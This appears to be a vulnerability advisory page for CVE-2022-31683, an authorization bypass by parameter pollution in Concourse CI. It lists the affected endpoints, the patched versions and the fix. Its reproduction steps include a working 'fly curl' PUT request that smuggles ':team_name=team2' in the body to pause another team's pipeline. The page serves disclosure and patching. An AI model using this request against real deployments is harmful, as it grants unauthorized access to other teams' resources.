First published: Wed Oct 19 2022(Updated: )
### Impact For some Post/Put Concourse endpoint containing `:team_name` in the URL, a Concourse user can send a request with body including `:team_name=team2` to bypass team scope check to gain access to certain resources belong to any other team. The user only needs a valid user session and belongs to team2. Exploitable endpoints: ``` {Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/jobs/:job_name/builds/:build_name", Method: "POST", Name: RerunJobBuild}, {Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/jobs/:job_name/pause", Method: "PUT", Name: PauseJob}, {Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/jobs/:job_name/unpause", Method: "PUT", Name: UnpauseJob}, {Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/jobs/:job_name/schedule", Method: "PUT", Name: ScheduleJob}, {Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/pause", Method: "PUT", Name: PausePipeline}, {Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/unpause", Method: "PUT", Name: UnpausePipeline}, {Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/expose", Method: "PUT", Name: ExposePipeline}, {Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/hide", Method: "PUT", Name: HidePipeline}, {Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/rename", Method: "PUT", Name: RenamePipeline}, {Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/archive", Method: "PUT", Name: ArchivePipeline}, {Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/resources/:resource_name/versions/:resource_config_version_id/enable", Method: "PUT", Name: EnableResourceVersion}, {Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/resources/:resource_name/versions/:resource_config_version_id/disable", Method: "PUT", Name: DisableResourceVersion}, {Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/resources/:resource_name/versions/:resource_config_version_id/pin", Method: "PUT", Name: PinResourceVersion}, {Path: "/api/v1/teams/:team_name/pipelines/:pipeline_name/resources/:resource_name/unpin", Method: "PUT", Name: UnpinResource}, {Path: "/api/v1/teams/:team_name/artifacts", Method: "POST", Name: CreateArtifact}, ``` ### Steps to reproduce 1. Set up a Concourse deployment with team 1 (with pipeline 1) and team 2. User is in team 2 but not team 1. 2. Login as user to team 2. ``` fly -t ci login -n team2 -u user -p password ``` 3. Try pausing pipeline 1 in team 1 using fly. Verify the command output is `pipeline 'pipeline1' not found`. ``` fly -t ci pause-pipeline -p pipeline1 ``` 4. Send a customized request through `fly curl` command intend to pause pipeline 1 again. ``` fly -t ci curl /api/v1/teams/team1/pipelines/pipeline1/pause -- -X PUT -d ":team_name=team2" -H "Content-type: application/x-www-form-urlencoded" ``` 5. pipeline 1 in team 1 will be paused. In step 4, the parameter pollution would allow an user from any team to pause a pipeline that belongs to other team. ### Patches Concourse [v6.7.9](https://github.com/concourse/concourse/releases/tag/v6.7.9) and [v7.8.3](https://github.com/concourse/concourse/releases/tag/v7.8.3) were both released with a fix on October 12, 2022. Instead of using [`FormValue`](https://pkg.go.dev/net/http#Request.FormValue) to parse team_name in the request, where allows body parameters to take precedence over URL query string values, both patch versions are now using `URL.Query().Get()` over multiple scope handlers to prevent the parameter pollution. ### Workarounds No known workarounds for existing versions. ### References * https://github.com/concourse/concourse/pull/8566: PR with the fix ### For more information If you have any questions or comments about this advisory, you may reach us privately at [security@concourse-ci.org](mailto:security@concourse-ci.org).
Credit: security@vmware.com
Affected Software | Affected Version | How to fix |
---|---|---|
Pivotal Software Concourse | >=6.0.0<6.7.9 | |
Pivotal Software Concourse | >=7.0.0<7.8.3 | |
go/github.com/concourse/concourse | >=7.0.0<7.8.3 | 7.8.3 |
go/github.com/concourse/concourse | <6.7.9 | 6.7.9 |
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
CVE-2022-31683 is a vulnerability in Concourse versions 7.x.y prior to 7.8.3 and 6.x.y prior to 6.7.9 that allows an authorization bypass, allowing a user to gain access to certain resources belonging to other teams.
CVE-2022-31683 has a severity rating of 5.4, which is considered medium.
To fix CVE-2022-31683, you should upgrade to Concourse version 7.8.3 or 6.7.9, depending on your current version.
The affected software of CVE-2022-31683 is Concourse versions 7.x.y prior to 7.8.3 and 6.x.y prior to 6.7.9, specifically the Pivotal Software Concourse.
You can find more information about CVE-2022-31683 in the GitHub security advisory: https://github.com/concourse/concourse/security/advisories/GHSA-5jp2-vwrj-99rf